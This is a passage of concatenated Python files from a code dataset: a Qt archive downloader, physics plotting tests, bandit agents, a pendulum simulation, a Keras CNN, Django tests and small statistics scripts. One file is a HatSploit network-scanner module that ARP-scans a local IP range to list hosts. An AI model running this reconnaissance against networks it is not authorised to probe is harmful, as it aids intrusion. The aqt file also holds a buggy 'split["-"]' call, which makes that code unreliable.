self.tokenList[index].objectCode\n\n\n","sub_path":"202-SP-Project1c/TokenTable.py","file_name":"TokenTable.py","file_ext":"py","file_size_in_byte":10684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"68128970","text":"#!/usr/bin/env python\n#\n# Copyright (C) 2018 Linus Jahn \n# Copyright (C) 2019 Hiroshi Miura \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\n# the Software, and to permit persons to whom the Software is furnished to do so,\n# subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\n# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\n# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\n# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\n# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\nimport logging\nimport requests\nimport traceback\nimport xml.etree.ElementTree as ElementTree\nfrom six import StringIO\n\n\nclass QtPackage:\n name = \"\"\n url = \"\"\n archive = \"\"\n desc = \"\"\n mirror = None\n\n def __init__(self, name, archive_url, archive, package_desc, has_mirror=False):\n self.name = name\n self.url = archive_url\n self.archive = archive\n self.desc = package_desc\n self.has_mirror = has_mirror\n\n\nclass QtArchives:\n BASE_URL = 'https://download.qt.io/online/qtsdkrepository/'\n archives = []\n base = None\n\n def __init__(self, os_name, qt_version, target, arch, mirror=None):\n self.qt_version = qt_version\n self.target = target\n self.arch = arch\n if mirror is not None:\n self.has_mirror = True\n self.base = mirror + '/online/qtsdkrepository/'\n else:\n self.base = self.BASE_URL\n qt_ver_num = qt_version.replace(\".\", \"\")\n\n # install mingw runtime package\n if arch in ['win64_mingw73', 'win32_mingw73', 'win64_mingw53', 'win32_mingw53']:\n archive_url = self.base + 'windows_x86/desktop/tools_mingw/'\n update_xml_url = \"{0}Updates.xml\".format(archive_url)\n try:\n r = requests.get(update_xml_url)\n except requests.exceptions.ConnectionError as e:\n print(\"Caught download error: %s\" % e.args)\n exc_buffer = StringIO()\n traceback.print_exc(file=exc_buffer)\n logging.error('Download error:\\n%s', exc_buffer.getvalue())\n raise e\n else:\n self.update_xml = ElementTree.fromstring(r.text)\n for packageupdate in self.update_xml.iter(\"PackageUpdate\"):\n name = packageupdate.find(\"Name\").text\n if name.split(\".\")[-1] != arch:\n continue\n downloadable_archives = packageupdate.find(\"DownloadableArchives\").text.split(\", \")\n full_version = packageupdate.find(\"Version\").text\n split_version = full_version.split[\"-\"]\n named_version = split_version[0] + \"-\" + split_version[1]\n package_desc = packageupdate.find(\"Description\").text\n for archive in downloadable_archives:\n # ex. 7.3.0-1x86_64-7.3.0-release-posix-seh-rt_v5-rev0.7z\n package_url = archive_url + name + \"/\" + named_version + archive\n self.archives.append(QtPackage(name, package_url, archive, package_desc,\n has_mirror=(mirror is not None)))\n # Ordinary packages\n if os_name == 'windows':\n archive_url = self.base + os_name + '_x86/' + target + '/' + 'qt5_' + qt_ver_num + '/'\n else:\n archive_url = self.base + os_name + '_x64/' + target + '/' + 'qt5_' + qt_ver_num + '/'\n\n # Get packages index\n update_xml_url = \"{0}Updates.xml\".format(archive_url)\n try:\n r = requests.get(update_xml_url)\n except requests.exceptions.ConnectionError as e:\n print(\"Caught download error: %s\" % e.args)\n exc_buffer = StringIO()\n traceback.print_exc(file=exc_buffer)\n logging.error('Download error:\\n%s', exc_buffer.getvalue())\n raise e\n else:\n self.update_xml = ElementTree.fromstring(r.text)\n for packageupdate in self.update_xml.iter(\"PackageUpdate\"):\n name = packageupdate.find(\"Name\").text\n if name.split(\".\")[-1] != arch:\n continue\n if name.split(\".\")[-2] == \"debug_info\":\n continue\n if packageupdate.find(\"DownloadableArchives\").text is None:\n continue\n if name == \"qt.qt5.{}.{}\".format(qt_ver_num, arch) or name == \"qt.{}.{}\".format(qt_ver_num, arch):\n # basic packages\n pass\n else:\n # optional packages: FIXME: check option whether install or not\n pass\n downloadable_archives = packageupdate.find(\"DownloadableArchives\").text.split(\", \")\n full_version = packageupdate.find(\"Version\").text\n package_desc = packageupdate.find(\"Description\").text\n for archive in downloadable_archives:\n package_url = archive_url + name + \"/\" + full_version + archive\n self.archives.append(QtPackage(name, package_url, archive, package_desc,\n has_mirror=(mirror is not None)))\n\n if len(self.archives) == 0:\n print(\"Error while parsing package information!\")\n exit(1)\n\n def get_archives(self):\n return self.archives\n\n def get_target_config(self):\n return self.qt_version, self.target, self.arch\n","sub_path":"aqt/archives.py","file_name":"archives.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"275424763","text":"import sys\nif '../..' not in sys.path:\n sys.path.append('../..')\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sec_emission_model_furman_pivi as fp\nimport mystyle as ms\nfrom scipy.constants import e as qe\n\nplt.close('all')\nms.mystyle(12)\nlinewid = 2\n\nme = 9.10938356e-31\n\n\ndef del_elas_ECLOUD(energy, R_0=0.7, E_max=332., E_0=150.):\n del_elas = R_0 * ((np.sqrt(energy) - np.sqrt(energy + E_0)) / (np.sqrt(energy) + np.sqrt(energy + E_0)))**2\n return del_elas\n\n\ndef del_true_ECLOUD(energy, del_max, s=1.35, E_max=332., costheta=1.):\n angular_factor = np.exp(0.5 * (1. - costheta))\n E_max_tilde = E_max * (1. + 0.7 * (1. - costheta))\n x = energy / E_max_tilde\n del_true = del_max * s * x / (s - 1 + x**s)\n return del_true * angular_factor\n\n\nfurman_pivi_surface_tweak = {\n 'use_modified_sigmaE': False,\n 'use_ECLOUD_theta0_dependence': True,\n 'use_ECLOUD_energy': False,\n 'conserve_energy': False,\n 'exclude_rediffused': True,\n 'choice': 'poisson',\n 'M_cut': 10,\n 'p_n': np.array([1.21963859, 1.66070543, 1.21935223, 1.09987752, 4.28158656, 1.02052557, 1.0247471, 1.02307995, 29.93491271, 1.02045612]),\n 'eps_n': np.array([7.44033631e+00, 2.47339424e+00, 7.45004962e+00, 1.63618903e+01, 4.97986255e-01, 7.96170380e+01, 6.60354258e+01, 7.08053955e+01, 5.64779654e-02, 7.98873331e+01]),\n # Parameters for backscattered electrons\n 'p1EInf': 0.002158, # Changed this\n 'p1Ehat': 0.709633, # Changed this\n 'eEHat': 0.,\n 'w': 46.028959, # Changed this\n 'p': 0.468907, # Changed this\n 'e1': 0., # Changed this\n 'e2': 2.,\n 'sigmaE': 2.,\n # Parameters for rediffused electrons\n 'p1RInf': 0.2,\n 'eR': 0.041,\n 'r': 0.104,\n 'q': 0.5,\n 'r1': 0.26,\n 'r2': 2.,\n # Parameters for true secondaries\n 'deltaTSHat': 1.8,\n 'eHat0': 332.,\n 's': 1.35,\n 't1': 0.5, # 0.706340, # Changed this\n 't2': 1., #0.715223, # Changed this\n 't3': 0.7,\n 't4': 1.}\n\nfurman_pivi_surface_LHC = {\n 'use_modified_sigmaE': False,\n 'use_ECLOUD_theta0_dependence': False,\n 'use_ECLOUD_energy': False,\n 'conserve_energy': False,\n 'exclude_rediffused': False,\n 'choice': 'poisson',\n 'M_cut': 10,\n 'p_n': np.array([2.5, 3.3, 2.5, 2.5, 2.8, 1.3, 1.5, 1.5, 1.5, 1.5]),\n 'eps_n': np.array([1.5, 1.75, 1., 3.75, 8.5, 11.5, 2.5, 3., 2.5, 3.]),\n # Parameters for backscattered electrons\n 'p1EInf': 0.02,\n 'p1Ehat': 0.496,\n 'eEHat': 0.,\n 'w': 60.86,\n 'p': 1.,\n 'e1': 0.26,\n 'e2': 2.,\n 'sigmaE': 2.,\n # Parameters for rediffused electrons\n 'p1RInf': 0.2,\n 'eR': 0.041,\n 'r': 0.104,\n 'q': 0.5,\n 'r1': 0.26,\n 'r2': 2.,\n # Parameters for true secondaries\n 'deltaTSHat': 1.8848,\n 'eHat0': 332.,\n 's': 1.35,\n 't1': 0.5, # t1 and t2 based on taylor expansion\n 't2': 1., # of PyECLOUD formula for E_max(theta)\n 't3': 0.7,\n 't4': 1.}\n\nfurman_pivi_surface = {\n 'use_modified_sigmaE': False,\n 'use_ECLOUD_theta0_dependence': False,\n 'use_ECLOUD_energy': False,\n 'conserve_energy': False,\n 'exclude_rediffused': False,\n 'choice': 'poisson',\n 'M_cut': 10,\n 'p_n': np.array([2.5, 3.3, 2.5, 2.5, 2.8, 1.3, 1.5, 1.5, 1.5, 1.5]),\n 'eps_n': np.array([1.5, 1.75, 1., 3.75, 8.5, 11.5, 2.5, 3., 2.5, 3.]),\n 'p1EInf': 0.02,\n 'p1Ehat': 0.496,\n 'eEHat': 0.,\n 'w': 60.86,\n 'p': 1.,\n 'e1': 0.26,\n 'e2': 2.,\n 'sigmaE': 2.,\n 'p1RInf': 0.2,\n 'eR': 0.041,\n 'r': 0.104,\n 'q': 0.5,\n 'r1': 0.26,\n 'r2': 2.,\n 'deltaTSHat': 1.6 - 0.22, #1.8848,\n 'eHat0': 276.8,\n 's': 1.54,\n 't1': 0.66,\n 't2': 0.8,\n 't3': 0.7,\n 't4': 1.}\n\n# Scaled py POSINST to del_tot_max = 1.6\nfurman_pivi_surface_scaled = {\n 'use_modified_sigmaE': False,\n 'use_ECLOUD_theta0_dependence': False,\n 'use_ECLOUD_energy': False,\n 'conserve_energy': False,\n 'exclude_rediffused': False,\n 'choice': 'poisson',\n 'M_cut': 10,\n 'p_n': np.array([2.5, 3.3, 2.5, 2.5, 2.8, 1.3, 1.5, 1.5, 1.5, 1.5]),\n 'eps_n': np.array([1.5, 1.75, 1., 3.75, 8.5, 11.5, 2.5, 3., 2.5, 3.]),\n 'p1EInf': 0.015294, # Changed this\n 'p1Ehat': 0.382362, # Changed this\n 'eEHat': 0.,\n 'w': 60.86,\n 'p': 1.,\n 'e1': 0.26,\n 'e2': 2.,\n 'sigmaE': 2.,\n 'p1RInf': 0.152945, # Changed this\n 'eR': 0.041,\n 'r': 0.104,\n 'q': 0.5,\n 'r1': 0.26,\n 'r2': 2.,\n 'deltaTSHat': 1.441353, # Changed this\n 'eHat0': 276.8,\n 's': 1.54,\n 't1': 0.66,\n 't2': 0.8,\n 't3': 0.7,\n 't4': 1.}\n\nflag_costheta_delta_scale = True\nflag_costheta_Emax_shift = True\n\nsey_mod = fp.SEY_model_furman_pivi(E_th=35., sigmafit=1.0828, mufit=1.6636, secondary_angle_distribution='cosine_3D',\n switch_no_increase_energy=0, thresh_low_energy=-1,\n furman_pivi_surface=furman_pivi_surface, flag_costheta_delta_scale=flag_costheta_delta_scale,\n flag_costheta_Emax_shift=flag_costheta_Emax_shift)\n\n\ndef extract_sey_curves(n_rep, E_impact_eV_test, cos_theta_test, charge, mass):\n\n deltas = {}\n for etype in list(sey_mod.event_types.keys()):\n etype_name = sey_mod.event_types[etype]\n deltas[etype_name] = np.zeros((len(cos_theta_test), len(E_impact_eV_test)))\n print('Extracting SEY curves...')\n for i_ct, ct in enumerate(cos_theta_test):\n print(('%d/%d' % (i_ct + 1, len(cos_theta_test))))\n for i_ene, Ene in enumerate(E_impact_eV_test):\n\n nel_impact = np.ones(n_rep)\n # Assuming normal is along x\n v_mod = np.sqrt(2 * Ene * qe / mass) * np.ones_like(nel_impact)\n vx = v_mod * ct\n vy = v_mod * np.sqrt(1 - ct * ct)\n\n nel_emit_tot_events, event_type, event_info,\\\n nel_replace, x_replace, y_replace, z_replace, vx_replace, vy_replace, vz_replace, i_seg_replace,\\\n nel_new_MPs, x_new_MPs, y_new_MPs, z_new_MPs, vx_new_MPs, vy_new_MPs, vz_new_MPs, i_seg_new_MPs =\\\n sey_mod.impacts_on_surface(\n mass=mass, nel_impact=nel_impact, x_impact=nel_impact * 0, y_impact=nel_impact * 0, z_impact=nel_impact * 0,\n vx_impact=vx * np.ones_like(nel_impact),\n vy_impact=vy * np.ones_like(nel_impact),\n vz_impact=nel_impact * 0,\n Norm_x=np.ones_like(nel_impact), Norm_y=np.zeros_like(nel_impact),\n i_found=np.int_(np.ones_like(nel_impact)),\n v_impact_n=vx * np.ones_like(nel_impact),\n E_impact_eV=Ene * np.ones_like(nel_impact),\n costheta_impact=ct * np.ones_like(nel_impact),\n nel_mp_th=1,\n flag_seg=True)\n\n for etype in list(sey_mod.event_types.keys()):\n etype_name = sey_mod.event_types[etype]\n thisdelta = deltas[etype_name]\n thisdelta[i_ct, i_ene] = np.sum(\n nel_emit_tot_events[event_type == etype]) / np.sum(nel_impact)\n deltas[etype_name] = thisdelta\n\n print('Done extracting SEY curves.')\n\n return deltas\n\n\ncos_theta_test = np.linspace(0, 1., 10)\nE_impact_eV_test = np.array(list(np.arange(0, 499., 5.)) + list(np.arange(500., 2000, 25.)))\nn_rep = int(1e3)\n\ndeltas = extract_sey_curves(n_rep, E_impact_eV_test, cos_theta_test, charge=qe, mass=me)\ndel_true_mat = deltas['true']\ndel_elast_mat = deltas['elast']\ndel_rediff_mat = deltas['rediff']\ndel_absorb_mat = deltas['absorb']\n\nplt.close('all')\nms.mystyle_arial()\n\nfig1 = plt.figure(1, figsize=(3 * 8, 2 * 8))\nfig1.set_facecolor('w')\nsp1 = fig1.add_subplot(2, 3, 1)\nsp2 = fig1.add_subplot(2, 3, 2, sharex=sp1)\nsp3 = fig1.add_subplot(2, 3, 3, sharex=sp1)\nsp4 = fig1.add_subplot(2, 3, 4, sharex=sp1)\nsp5 = fig1.add_subplot(2, 3, 5, sharex=sp1)\nsp6 = fig1.add_subplot(2, 3, 6, sharex=sp1)\n\nfor i_ct, ct in enumerate(cos_theta_test):\n thiscol = ms.colorprog(i_ct, len(cos_theta_test))\n label = 'costheta=%.2f' % ct\n sp1.plot(E_impact_eV_test, del_true_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n sp2.plot(E_impact_eV_test, del_elast_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n sp3.plot(E_impact_eV_test, del_rediff_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n sp4.plot(E_impact_eV_test, del_absorb_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n sp5.plot(E_impact_eV_test, del_true_mat[i_ct, :] + del_rediff_mat[i_ct, :] + del_elast_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n sp6.plot(E_impact_eV_test, del_true_mat[i_ct, :] + del_elast_mat[i_ct, :], color=thiscol, label=label, linewidth=linewid)\n\nsp3.plot(0, 0, 'white', label='Model')\nsp1.set_ylabel('Delta true')\nsp2.set_ylabel('Delta elast')\nsp3.set_ylabel('Delta rediff')\nsp4.set_ylabel('Delta absorb')\nsp5.set_ylabel('Delta total')\nsp6.set_ylabel(r'$\\delta_{ts} + \\delta_{e}$')\n\nfor sp in [sp1, sp2, sp3, sp4, sp5, sp6]:\n sp.grid(True)\n sp.set_xlabel('Electron energy [eV]')\n\nplt.subplots_adjust(right=0.99, left=.05)\n\ntest_obj = sey_mod\n\nenergy = np.linspace(0., 2000, num=int(1e5))\n\nfor costheta in np.linspace(0, 1., 10):\n delta_ts_vec = test_obj.delta_ts(energy, costheta)\n delta_e_vec = test_obj.delta_e(energy, costheta)\n delta_r_vec = test_obj.delta_r(energy, costheta)\n\n sp2.plot(energy, delta_e_vec, color='k', linewidth=linewid)\n sp3.plot(energy, delta_r_vec, color='k', linewidth=linewid)\n sp1.plot(energy, delta_ts_vec, color='k', linewidth=linewid)\n sp5.plot(energy, delta_r_vec + delta_ts_vec + delta_e_vec, color='k', linewidth=linewid)\n sp6.plot(energy, delta_ts_vec + delta_e_vec, color='k', linewidth=linewid)\n\nsp2.plot(energy, del_elas_ECLOUD(energy), '--', color='r', linewidth=linewid, label='ECLOUD model')\nfor ct in cos_theta_test:\n sp1.plot(energy, del_true_ECLOUD(energy, del_max=test_obj.deltaTSHat, costheta=ct), '--', color='r', linewidth=linewid, label='ECLOUD model')\nsp2.legend(loc='best', prop={'size': 14})\n\nplt.suptitle('SEY extraction tests: Furman-Pivi model \\nexclude_rediffused=%s' % str(sey_mod.exclude_rediffused), fontsize=30)\n\nplt.show()\n","sub_path":"testing/tests_modules/010_test_Furman_Pivi_sey_curves.py","file_name":"010_test_Furman_Pivi_sey_curves.py","file_ext":"py","file_size_in_byte":10190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"614057759","text":"import random\nimport numpy as np\n\nclass NaiveGambler(object):\n \"\"\"The naive gambler just randomly selects a lever on each play.\"\"\"\n def __init__(self, numLevers):\n self.numLevers = numLevers\n\n def play(self, pull):\n pull(random.randrange(self.numLevers))\n\n def report(self):\n return \"\"\n\nclass ExactAverageGambler(object):\n def __init__(self, numLevers):\n self.exploreRate = 0.1\n self.actualPayouts = np.zeros([numLevers])\n self.numPulls = np.ones([numLevers])\n self.stopLearningAt = 10000\n\n def play(self, pull):\n r = random.random()\n numPulls = self.numPulls.sum()\n explore = r < self.exploreRate and numPulls < self.stopLearningAt\n if explore:\n lever = random.randrange(len(self.actualPayouts))\n else:\n lever = (self.actualPayouts / self.numPulls).argmax()\n payout = pull(lever)\n self.numPulls[lever] += 1\n self.actualPayouts[lever] += payout\n\n def report(self):\n return str(self.actualPayouts / self.numPulls)\n\nclass BasicEstimatingGambler(object):\n def __init__(self, numLevers):\n self.learningRate = 0.1\n self.exploreRate = 0.1\n self.estimatedPayouts = np.zeros([numLevers])\n\n def play(self, pull):\n r = random.random()\n explore = r < self.exploreRate\n if explore:\n # We're going to explore, so choose uniform-random from possible moves.\n lever = random.randrange(len(self.estimatedPayouts))\n payout = pull(lever)\n # Update estimate of expected payouts\n difference = payout - self.estimatedPayouts[lever]\n self.estimatedPayouts[lever] += self.learningRate * difference\n else:\n # We're going to exploit (use the maximum)\n # http://stackoverflow.com/questions/42071597/numpy-argmax-random-tie-breaking\n lever = np.random.choice(np.flatnonzero(self.estimatedPayouts == self.estimatedPayouts.max()))\n payout = pull(lever)\n\n def report(self):\n return str(self.estimatedPayouts)\n\nif __name__ == \"__main__\":\n from kbandit import bandit5a\n from casino import evaluate\n evaluate(NaiveGambler, bandit5a)\n evaluate(BasicEstimatingGambler, bandit5a)\n evaluate(ExactAverageGambler, bandit5a)\n","sub_path":"bandits/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"60164585","text":"#!/usr/bin/env python3\n\n#\n# This module requires HatSploit: https://hatsploit.netlify.app\n# Current source: https://github.com/EntySec/HatSploit\n#\n\nimport scapy.all\n\nfrom hatsploit.lib.module import Module\n\n\nclass HatSploitModule(Module):\n details = {\n 'Name': \"Network Scanner\",\n 'Module': \"auxiliary/multi/scanner/network_scanner\",\n 'Authors': [\n 'Ivan Nikolsky (enty8080) - module developer'\n ],\n 'Description': \"Scan local network.\",\n 'Comments': [\n ''\n ],\n 'Platform': \"multi\",\n 'Risk': \"low\"\n }\n\n options = {\n 'RANGE': {\n 'Description': \"IP range.\",\n 'Value': \"192.168.1.1/24\",\n 'Type': \"ipv4_range\",\n 'Required': True\n },\n 'TIMEOUT': {\n 'Description': \"Timeout to scan.\",\n 'Value': 10,\n 'Type': \"number\",\n 'Required': True\n }\n }\n\n def run(self):\n ip_range, timeout = self.parse_options(self.options)\n\n self.output_process(\"Scanning local network...\")\n\n try:\n arp = scapy.all.ARP(pdst=ip_range)\n ether = scapy.all.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n result = scapy.all.srp(ether / arp, timeout=float(timeout), verbose=False)[0]\n\n if len(result) > 0:\n net_data = list()\n headers = (\"Host\", \"MAC\")\n for _, received in result:\n net_data.append((received.psrc, received.hwsrc))\n self.print_table(\"Network Devices\", headers, *net_data)\n else:\n self.output_warning(\"No hosts detected in local network.\")\n except Exception:\n self.output_error(\"Failed to scan local network!\")\n","sub_path":"hatsploit/modules/auxiliary/multi/scanner/network_scanner.py","file_name":"network_scanner.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"460027474","text":"#coding: latin1\r\n\r\n'''\r\n@author: Lars Heppert\r\n'''\r\n\r\nimport pygame, sys, math\r\n\r\nwindowMargin = 30\r\nwindowWidth = 800\r\nwindowHeight = 400\r\nwindowCenter = windowWidth/2, 40\r\n\r\nbackgroundColor = (0, 0, 0)\r\nwhite = (255, 255, 255)\r\n\r\ndef handleEvents():\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n sys.exit(0)\r\n elif event.type == pygame.KEYDOWN:\r\n sys.exit(0)\r\n elif event.type == pygame.MOUSEBUTTONDOWN:\r\n sys.exit(0)\r\n \r\ndef getCirclePoint(position, scale, cursorLength):\r\n degrees = getWirePositionDegrees(position, scale)\r\n xPos = int(round(math.cos(degrees/180.0*math.pi)*cursorLength+windowCenter[0]))\r\n yPos = int(round(math.sin(degrees/180.0*math.pi)*cursorLength+windowCenter[1]))\r\n return (xPos, yPos)\r\n\r\ndef getWirePositionDegrees(position, scale):\r\n offset = -270\r\n degrees = 360 / scale * position + offset\r\n return degrees\r\n\r\ndef drawPendulum(color, width, length, position, scale):\r\n end = getCirclePoint(position, scale, length);\r\n pygame.draw.line(screen, color, windowCenter, end, width)\r\n pygame.draw.circle(screen, white, end, 30)\r\n pygame.draw.circle(screen, white, windowCenter, 8)\r\n\r\n\r\ndef calculateDelta(time, alpha=45.0, gravity=9.81, wireLength=5.0):\r\n # dampingConstant = 1.0/20.0\r\n # e^(-dampingConstant*time) = 1.0/e^(dampingConstant*time)\r\n damping = 1.0/math.exp(time/20.0)\r\n alpha = alpha*math.cos(math.sqrt(gravity/wireLength)*time)*damping\r\n \r\n return alpha\r\n\r\ndef main():\r\n # Initialise screen\r\n global screen, alpha\r\n pygame.init()\r\n pygame.display.set_caption('Pendel-Simulation')\r\n screen = pygame.display.set_mode((windowWidth, windowHeight), pygame.HWSURFACE | pygame.DOUBLEBUF)\r\n\r\n # Event loop\r\n delay = 20\r\n time = 0.0\r\n alpha = 45.0\r\n while True:\r\n handleEvents()\r\n screen.fill(backgroundColor)\r\n \r\n drawPendulum(white, 3, 300, alpha, 360)\r\n alpha = calculateDelta(time)\r\n time += 0.02\r\n \r\n pygame.display.flip()\r\n pygame.time.delay(delay)\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"coding4fun/kapitel10/pendulum_v1.py","file_name":"pendulum_v1.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"598927252","text":"from tensorflow import keras\nfrom preprocessing import train_data, train_labels, test_data, test_labels\nimport matplotlib.pyplot as plt\n\nfilters = 32\nmodel = keras.Sequential([\n keras.layers.Conv2D(filters, (3, 3), padding='same', input_shape=train_data.shape[1:], activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(),\n\n keras.layers.Conv2D(filters * 2, (3, 3), padding='same', activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(),\n\n keras.layers.Conv2D(filters * 2, (3, 3), padding='same', activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(),\n\n keras.layers.Conv2D(filters * 3, (3, 3), padding='same', activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(),\n\n keras.layers.Conv2D(filters * 4, (3, 3), padding='same', activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.BatchNormalization(),\n\n keras.layers.Conv2D(filters * 3, (3, 3), padding='same', activation='relu'),\n keras.layers.MaxPooling2D(pool_size=(2, 2)),\n keras.layers.Dropout(0.2),\n\n keras.layers.Flatten(),\n keras.layers.Dense(filters * 3, activation='relu'),\n keras.layers.Dense(4, activation='softmax')\n])\n\nmodel.compile(optimizer=keras.optimizers.Adam(lr=0.0001),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\nhistory = model.fit(train_data, train_labels, epochs=20, validation_split=0.12)\n\n\ndef graphs(history):\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.grid()\n plt.show()\n\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'val'], loc='upper left')\n plt.grid()\n plt.show()\ngraphs(history)\n\n\nresults = model.evaluate(test_data, test_labels)\nprint('test loss, test acc:', results)\n\nmodel.save('model.h5', include_optimizer=False)\nprint(\"Saved model to disk\")\n","sub_path":"net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":2273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"130149275","text":"from django.test import TestCase\n\nfrom error_posts.mommy_recipes import django_traceback\nfrom error_posts.models import ErrorPost\nfrom error_posts.forms import ErrorPostForm\n\nfrom django_comments.models import Comment\nfrom django_comments.forms import CommentSecurityForm\nfrom error_posts.forms import CommentFormWithMarkDown\nfrom model_mommy import mommy\nfrom users.models import User\n\n\nclass TestErrorPostForm(TestCase):\n\n def setUp(self):\n self.form = ErrorPostForm\n self.params = {\n 'exception_type': 'A',\n 'error_message': 'A',\n 'traceback': django_traceback,\n 'django_version': '1.9',\n 'recaptcha': 'a',\n }\n\n def test_save_form_success(self):\n error_post_form = self.form(self.params)\n error_post_form.save(data_came_from=\"site\")\n error_post_count = ErrorPost.objects.count()\n self.assertEqual(error_post_count, 1)\n\n def test_form_is_valid(self):\n error_post_form = self.form(self.params)\n self.assertEqual(error_post_form.is_valid(), True)\n\n def test_save_form_create_right_object(self):\n error_post_form = self.form(self.params)\n error_post_form.save(data_came_from=\"site\")\n error_post = ErrorPost.objects.first()\n self.assertEqual(error_post.exception_type, self.params['exception_type'])\n self.assertEqual(error_post.error_message, self.params['error_message'])\n self.assertEqual(error_post.traceback, self.params['traceback'])\n self.assertEqual(error_post.django_version, self.params['django_version'])\n\n def test_initialized_fields_are_readonly(self):\n error_post_form = self.form(initial=self.params)\n self.assertEqual(error_post_form['traceback'].field.widget.attrs['readonly'], True)\n self.assertEqual(error_post_form['django_version'].field.widget.attrs['readonly'], True)\n self.assertEqual(error_post_form['exception_type'].field.widget.attrs['readonly'], True)\n self.assertEqual(error_post_form['error_message'].field.widget.attrs['readonly'], True)\n\n def test_create_error_post_with_data_from_lib(self):\n error_post_form = self.form(self.params)\n error_post_form.save(data_came_from=\"lib\")\n error_post = ErrorPost.objects.first()\n self.assertEqual(error_post.data_came_from, \"lib\")\n\n def test_create_error_post_with_data_from_site(self):\n error_post_form = self.form(self.params)\n error_post_form.save(data_came_from=\"site\")\n error_post = ErrorPost.objects.first()\n self.assertEqual(error_post.data_came_from, \"site\")\n\n\nclass TestCommentForm(TestCase):\n\n def setUp(self):\n self.form = CommentFormWithMarkDown\n self.params = {\n 'name': 'Alessandro',\n 'email': 'alessandro.henrique@labcodes.com.br',\n 'comment': 'This is a simple comment',\n }\n self.user = mommy.make(User)\n self.security_dict = CommentSecurityForm(self.user).generate_security_data()\n self.params.update(self.security_dict)\n self.comment = mommy.make(Comment)\n\n\n def test_form_is_valid(self):\n comment_form = self.form(data=self.params, target_object=self.comment)\n self.assertEqual(comment_form.is_valid(), True)\n","sub_path":"error_posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"580998418","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 18 14:32:05 2016\n\n@author: carlo\n\"\"\"\nimport scipy.stats as st\nimport numpy as np\n\nfor df in [2, 4, 6, 8, 59]:\n fname = \"chi2df\" + str(df) + \".csv\"\n print (\"Generating file: %s\" % fname)\n\n max_cval = st.chi2.isf(.01, df)\n print (\"Max. ChiSqr : %f\" % max_cval)\n\n q = np.arange(0, max_cval, 0.01)\n print (\"Number of lines: %d\" % len(q))\n\n f = open (fname,'w')\n for t in q:\n p = st.chi2.sf(t,df)\n f.write(\"%.2f,%.5f\\n\" % (t,p))\n f.close()\n print\n\n\n","sub_path":"chi2table_gen.py","file_name":"chi2table_gen.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"400312831","text":"# coding:utf-8\r\nimport pandas as pd\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\n# 1、创造数据\r\ndata=pd.read_excel(r'data1.xlsx',header=None)\r\nbiaoq=data.columns\r\nx_data = data[biaoq[:3]]\r\ny_data = data[biaoq[3]]\r\nx_tain =x_data[:900]\r\nx_test = x_data[900:]\r\ny_tain = y_data[:900]\r\ny_test = y_data[900:]\r\n\r\n# 2、构造分类器\r\nknn = KNeighborsClassifier(n_neighbors=7)\r\n# 3、训练模型\r\nknn.fit(x_tain,y_tain)\r\n# 4、模型预测\r\ny_ = knn.predict(x_test)\r\n# 